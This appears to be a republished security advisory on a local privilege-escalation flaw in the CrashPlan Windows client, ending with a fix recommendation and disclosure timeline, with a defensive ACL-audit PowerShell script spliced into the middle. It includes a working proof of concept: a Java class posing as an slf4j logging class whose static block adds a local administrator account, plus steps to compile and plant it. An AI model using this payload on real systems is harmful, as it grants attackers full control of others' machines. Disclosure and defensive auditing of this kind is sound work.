Crashplan Windows client Local Elevation of Privilege Vulnerability repair suggestions, crashplan Client

Source: Internet
Author: User
Tags: windows 7 x64 crashplan


This article reports and analyses a Local Elevation of Privilege vulnerability in CrashPlan Windows client 4.8.2.4. Any local user can abuse it to gain full control of the operating system. The vulnerability has been verified on a fully patched Windows 7 x64 English edition.
The root cause is that the Windows service "CrashPlan Backup Service" loads and executes files from the insecure file system location C:\ProgramData\CrashPlan.

Among other things, Java class files are searched for and ultimately loaded from there, which creates a class side-loading vulnerability.

The default file system ACL allows any local user to add new files to this location.
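A defender's check for the root cause described above, added here as an example and not part of the original article: it audits the data directory the article names for ACL entries that grant write or create rights to low-privilege principals, and lists any loose .class files under lang\ that the service could side-load. The path comes from the article; the list of low-privilege principals and the check of the lang\ subtree are assumptions about a default installation.

```powershell
# Added example (not from the original article): audit the CrashPlan data
# directory for ACL entries that let non-administrative principals create or
# write files, and list .class files under lang\ that the service could load.
# $DataDir is the path named in the article; the principal list below is an
# assumption about which accounts count as "any local user".
param(
    [string]$DataDir = 'C:\ProgramData\CrashPlan'
)

# Low-privilege principals whose write access to a directory a service loads
# code from indicates a side-loading risk (assumed list).
$lowPrivPrincipals = @(
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'Everyone',
    'NT AUTHORITY\INTERACTIVE'
)

# File-system rights that allow dropping or replacing a file.
$writeMask = [System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
             [System.Security.AccessControl.FileSystemRights]::CreateDirectories -bor
             [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl

function Get-RiskyAce {
    # Return each Allow ACE on $Path that gives a low-privilege principal
    # any of the write rights in $writeMask.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$writeMask) -ne 0) {
            [pscustomobject]@{
                Path      = $Path
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

function Get-SideloadCandidate {
    # List loose .class files under lang\, with owner and timestamp, so an
    # analyst can verify whether each one belongs to the installation.
    param([string]$Path)
    $langDir = Join-Path $Path 'lang'
    if (-not (Test-Path -LiteralPath $langDir)) { return }
    Get-ChildItem -LiteralPath $langDir -Recurse -File -Filter '*.class' -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                File     = $_.FullName
                Owner    = (Get-Acl -LiteralPath $_.FullName).Owner
                Modified = $_.LastWriteTime
            }
        }
}

if (-not (Test-Path -LiteralPath $DataDir)) {
    Write-Host "Data directory $DataDir not found; nothing to audit."
    return
}

# Check the data directory itself and the lang\ subtree the article names,
# since the subtree may carry its own (non-inherited) ACEs.
$risky = @(Get-RiskyAce -Path $DataDir)
$langPath = Join-Path $DataDir 'lang'
if (Test-Path -LiteralPath $langPath) { $risky += @(Get-RiskyAce -Path $langPath) }

if ($risky.Count -eq 0) {
    Write-Host "No low-privilege write access found on $DataDir."
} else {
    Write-Warning "Low-privilege principals can write into a directory the service loads code from:"
    $risky | Format-Table -AutoSize
}

$classes = @(Get-SideloadCandidate -Path $DataDir)
if ($classes.Count -gt 0) {
    Write-Warning "Loose .class files found under lang\; verify that each one belongs to the installed version:"
    $classes | Format-Table -AutoSize
}
```

Run it from an elevated prompt so Get-Acl can read every entry. A hit in the first table means a local user can drop files where the SYSTEM service looks for code; the vendor update is the fix, and until it is applied, removing the low-privilege write ACEs from the directory is a compensating control. Any file in the second table that is owned by a non-administrative account or is newer than the installation deserves a closer look.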

Therefore, malicious files can be placed there. To exploit this, I constructed the following Java class:

package org.slf4j.ext;

import java.io.Serializable;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.util.Date;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import java.beans.XMLDecoder;
import java.beans.XMLEncoder;
import java.beans.ExceptionListener;

/**
 * Base class for Event Data. Event Data contains data to be logged about an
 * Event. Users may extend this class for each EventType they want to log.
 *
 * @author Ralph Goers
 */
public class EventData implements Serializable {
    // Static initializer: runs once, as soon as the JVM loads this class.
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            Process pr = rt.exec("cmd.exe /C \"net user attacker Batman42 /add & net localgroup Administrators attacker /add\"");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /**
     * Default Constructor
     */
    public EventData() {
    }
}
To inject our own commands we use a Java static initializer block, which runs immediately after the JVM loads the class. To compile it, javac is all that is needed:

javac EventData.java

Finally, place the compiled class file in the folder C:\ProgramData\CrashPlan\lang\org\slf4j\ext, creating it if it does not exist.

After the system restarts, this Java class is loaded and our code runs with SYSTEM privileges. In this example, an attacker adds a local administrator account to the operating system.

Repair suggestions
Upgrade the affected version to the latest release as soon as possible.
Timeline
2017.5.18: vulnerability confirmed
2017.5.22: vulnerability documented and vendor notified
2017.5.25: vendor confirms the vulnerability and begins an urgent fix
2017.6.13: fixed version and accompanying instructions released
2018.2.15: public disclosure